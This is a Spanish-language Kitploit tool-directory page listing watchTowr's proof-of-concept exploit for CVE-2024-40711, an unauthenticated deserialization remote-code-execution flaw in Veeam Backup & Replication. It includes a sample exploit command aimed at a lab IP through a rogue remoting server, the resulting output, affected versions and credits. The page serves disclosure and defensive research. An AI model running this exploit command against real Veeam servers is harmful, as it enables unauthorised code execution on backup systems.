Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-40711 — Exploit de pre-autenticación para CVE-2024-40711 | Kitploit
Herramientas/GitHubGitHub/watchtowrlabs/cve-2024-40711
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingHerramienta de Acceso Remoto
GitHubwatchtowrlabs/cve-2024-40711

CVE-2024-40711

Exploit de pre-autenticación para CVE-2024-40711

Ver Repositorio
5518hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-40711

Exploit para Veeam backup and Replication Pre-Auth Deserialization CVE-2024-40711

Vea nuestra publicación en el blog para detalles técnicos

https://github.com/user-attachments/assets/24e8122c-3e84-408b-87a9-684a9aabeb70

PoC en Acción

root@kitploit:~
CVE-2024-40711.exe -f binaryformatter -g Veeam -c http://192.168.201.1:8000/trigger --targetveeam 192.168.201.158



                 __         .__  ___________
__  _  _______ _/  |_  ____ |  |_\__    ___/_____  _  _________
\ \/ \/ /\__  \\   __\/ ___\|  |  \|    | /  _ \ \/ \/ /\_  __ \
 \     /  / __ \|  | \  \___|   Y  \    |(  <_> )     /  | |  \/
  \/\_/  (____  /__|  \___  >___|  /____| \____/ \/\_/   |__|
              \/          \/     \/


        (*) Veeam Backup & Replication Unauthenticated Remote Code Execution Exploit (CVE-2024-40711)
          - Vulnerability Discovered by Florian Hauser (@frycos) at CODE WHITE Gmbh (@codewhitesec)
          - Exploit Written by Sina Kheirkhah (@SinSinology) at watchTowr
          - Thank you to my dear friend Soroush Dalili (@irsdl) for his help

        CVEs: [CVE-2024-40711]

(*) Creating payload for 'cmd /c mspaint.exe'
(*) Wrapping payload in the CDbCryptoKeyInfo custom gadget
(*) Sending Remoting Trigger
(*) Started Rogue Server
HttpServerChannel for 'trigger' created:
  http://192.168.201.1:8000/trigger

Press any key to exit ...
[*] Processing message for '/trigger' from 192.168.201.158:50592 ... sending payload!

Florian Hauser

Esta vulnerabilidad fue encontrada por Florian Hauser (@frycos) de CODE WHITE GmbH (@codewhitesec). Asegúrate de seguir su destacada investigación, nuestro rol fue solo recrear y desarrollar el exploit para este problema.

Versiones Afectadas

VersiónEstado
12.2.0.334Completamente parcheado. No afectado por las vulnerabilidades de esta publicación.
12.1.2.172Afectado, pero la explotación requiere autenticación. Los usuarios con bajos privilegios pueden ejecutar código arbitrario.
12.1.1.56 y anterioresVulnerable a RCE sin autenticación.

Autores del Exploit

Este exploit fue escrito por Sina Kheirkhah (@SinSinology) de watchTowr (@watchtowrcyber)

También nos gustaría aprovechar la oportunidad para agradecer a Soroush Dalili por su ayuda con este exploit.

Sigue a watchTowr Labs

Para las últimas investigaciones de seguridad, sigue al equipo de watchTowr Labs

  • https://labs.watchtowr.com/
  • https://twitter.com/watchtowrcyber
  • https://labs.watchtowr.com/veeam-backup-response-rce-with-auth-but-mostly-without-auth-cve-2024-40711-2/
  • https://github.com/codewhitesec/RogueRemotingServer
  • https://github.com/tyranid/ExploitRemotingService
  • https://www.veeam.com/kb4649
Descargar herramienta